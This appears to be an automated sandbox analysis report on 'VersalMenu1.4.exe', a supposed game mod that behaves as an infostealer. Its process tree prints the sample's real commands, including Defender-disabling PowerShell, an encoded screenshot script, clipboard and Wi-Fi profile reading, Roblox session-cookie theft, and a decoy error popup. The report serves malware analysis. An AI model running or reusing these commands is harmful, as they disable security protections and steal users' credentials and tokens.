Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-10-2024 20:04

General

  • Target

    VersalMenu1.4.exe

  • Size

    88.5MB

  • MD5

    c22c7c008fa84b8d5443aeccd5774868

  • SHA1

    b2793c86ee92425957be7428e0ba01ffcf0afd3b

  • SHA256

    11e86f56a51d27b1c3a18060472f3202bf3c8c603444e58062453998ff53d589

  • SHA512

    7d4e855635904e5794d29f4b9173719a61af9403845b1cfe10795179d34c3ae2de86ff0987682e672752be02416421c4316d024db68c82127c2ea31556e05cff

  • SSDEEP

    1572864:02Mq8JTni+OsNLcXrrBFUM8jJjiPT4dsXDfQYZmpvT9ZnIBdG:WJTnppREhFUtF8TfSvT9ZnSG

Malware Config

Signatures

  • Enumerates VirtualBox DLL files 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe
    "C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4284
    • C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe
      "C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VersalMenu1.4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4444
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4408
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:3612
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Enumerates VirtualBox DLL files
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5828
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              6⤵
                PID:1300
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\Versal\""
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1464
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\Users\Admin\Versal\activate.bat
                6⤵
                  PID:3292
                  • C:\Windows\system32\attrib.exe
                    attrib +s +h .
                    7⤵
                    • Sets file to hidden
                    • Views/modifies file attributes
                    PID:5360
                  • C:\Users\Admin\Versal\Versal Executor.exe
                    "Versal Executor.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2424
                    • C:\Users\Admin\Versal\Versal Executor.exe
                      "Versal Executor.exe"
                      8⤵
                      • Enumerates VirtualBox DLL files
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of SetWindowsHookEx
                      PID:6064
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "ver"
                        9⤵
                          PID:3884
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\Versal\""
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2068
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell (Get-CimInstance Win32_ComputerSystemProduct).UUID
                          9⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2240
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im "bound.exe"
                      7⤵
                      • Kills process with taskkill
                      PID:5164
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('your process failed to run! your pc is incompatible! Versal mod, your pc should be compatible soon, if you\x22re seeing this, my bad', 0, 'FAILED PROCESS', 16+16);close()""
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3812
              • C:\Windows\system32\mshta.exe
                mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('your process failed to run! your pc is incompatible! Versal mod, your pc should be compatible soon, if you\x22re seeing this, my bad', 0, 'FAILED PROCESS', 16+16);close()"
                4⤵
                  PID:3588
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4872
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1372
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2472
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3432
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3452
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:1968
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1392
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4388
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3776
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:980
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1044
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  3⤵
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1496
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    4⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:668
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4888
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo
                    4⤵
                    • Gathers system information
                    PID:4852
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4464
                  • C:\Windows\system32\reg.exe
                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                    4⤵
                      PID:864
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3816
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3476
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\juzsmgxd\juzsmgxd.cmdline"
                        5⤵
                          PID:5304
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB45C.tmp" "c:\Users\Admin\AppData\Local\Temp\juzsmgxd\CSC94643F1634D5D80E43E63D17FB0F7.TMP"
                            6⤵
                              PID:5848
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:3884
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:5716
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1408
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4240
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:4352
                                  • C:\Windows\system32\attrib.exe
                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Views/modifies file attributes
                                    PID:5228
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:5340
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:2300
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:5456
                                        • C:\Windows\system32\attrib.exe
                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:5884
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:5632
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:5760
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            3⤵
                                              PID:5816
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                4⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5952
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:6020
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:6084
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:4508
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5136
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                    3⤵
                                                      PID:116
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        4⤵
                                                          PID:3820
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                        3⤵
                                                          PID:5408
